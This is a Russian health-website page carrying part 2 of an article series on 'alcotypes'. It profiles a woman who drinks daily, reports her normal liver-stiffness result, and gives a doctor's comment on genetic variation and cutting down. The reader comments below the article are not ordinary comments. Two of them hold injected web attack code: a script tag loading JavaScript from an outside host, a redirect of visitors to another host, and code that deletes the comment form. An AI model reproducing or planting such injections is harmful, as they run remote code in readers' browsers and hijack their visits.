Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чья печень в опасности: а...  >>  Чья печень в опасности: алкотипы. Часть 2
 
Обратная связь
 

Чья печень в опасности: алкотипы. Часть 2

Размер шрифта
07 ноября 2013 00:00
  • google_analytics: false
  • Нравится

Не секрет, что одним из главных врагов печени является алкоголь. А какие отношения с алкоголем у вас?

Чья печень в опасности: алкотипы. Часть 2.

Болезни печени занимают пятое место среди причин смерти; за последние 10 лет смертность от болезней печени увеличилась на 20%. Однако зачастую заболевания печени протекают бессимптомно, а симптомы появляются только на поздней стадии. Поэтому многие люди не подозревают о том, что у них тяжелое заболевание. Большинство пациентов умирают от заболеваний печени уже после первой или второй госпитализации, поскольку не знают о своем заболевании. Во многих случаях заболевание оказывается настолько запущенным, что врачи практически бессильны.

Конечной стадией заболеваний печени является цирроз – замещение печеночной ткани рубцовой. Если вовремя распознать причину заболевания, можно замедлить его прогрессирование и не допустить цирроза. В рамках исследования группа людей прошла ультразвуковое обследование, которое носит название эластография и позволяет оценить жесткость печени. Результат в диапазоне от 7 до 14 кПа свидетельствует о повреждении печени, а более 14 кПа – о циррозе.

В серии статей мы решили рассказать вам о реальных людях, имеющих разные отношения с алкоголем, и результатах их обследования.

Алкотип 2: ни дня без алкоголя

Лариса Ромашкина, 46 лет, помощница руководителя, проживает в городе Орел; разведена, один ребенок. Рост 155 см, вес 58 кг, индекс массы тела 24 (норма).

Употребление алкоголя: 40 единиц алкоголя в неделю (одна единица = 10 мл).

Эластография: 2,4 кПа – норма.

Комментарий пациентки: «Результат превзошел все мои ожидания – я думала, он будет гораздо хуже и станет для меня стимулом к изменению образа жизни. Несколько раз в неделю я хожу в спортзал, но алкоголь – это моя слабость. В будние дни я каждый вечер выпиваю по два стакана вина, а в выходные могу выпить пару бутылок за вечер. Мне кажется, что эта привычка осталась у меня после работы в крупной компании, где часто устраивались вечеринки. Кроме того, мои родители любили выпить, а я не задумывалась о том, что алкоголь может навредить моему здоровью ни в 20, ни в 30 лет. Но когда мне предложили пройти обследование, я испугалась – ведь результаты могли быть самые плачевные. К счастью, мои ожидания не оправдались, и на данный момент моя печень находится в хорошем состоянии. Однако я понимаю, что если и дальше буду продолжать в таком духе, рано или поздно моя печень не выдержит подобной нагрузки».

Комментарий специалиста: «Поразительно, но результаты обследования действительно хорошие. Это объясняется тем, что у всех людей печень реагирует на алкоголь по-разному, что обусловлено генетическими причинами. Ларисе действительно повезло, что ее печень не пострадала, но это не значит, что подобное благополучие будет продолжаться до бесконечности. Клетки печени способны быстро восстанавливаться, но с возрастом процесс восстановления замедляется, а при выраженном поражении печени этот процесс может полностью прекратиться. Если Лариса хочет сохранить здоровье печени, ей следует сократить употребление алкоголя, как минимум, до 4 дней в неделю. На данный момент индекс массы тела находится в пределах нормы, однако, если увеличение его значения более 25 говорит об избыточной массе тела».

Все о печени и ее болезнях читайте в нашем специальном проекте «Заботься о печени».

Узнайте все про другие алкотипы здесь:

Алкотип 1: алкоголь от случая к случаю,

Алкотип 3: алкоголь в прошлом,

Алкотип 4: алкоголь по выходным,

Алкотип 5: любитель домашнего вина,

Алкотип 6: трезвенник.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Для кого алкоголь опасней всего   Чья печень в опасности: алкотипы. Часть 4   Чья печень в опасности: алкотипы. Часть 6   Чья печень в опасности: алкотипы. Часть 5  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что алкоголь делает с печенью
Как понять, что вы пьете много?
Самые неожиданные факты о похмелье

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.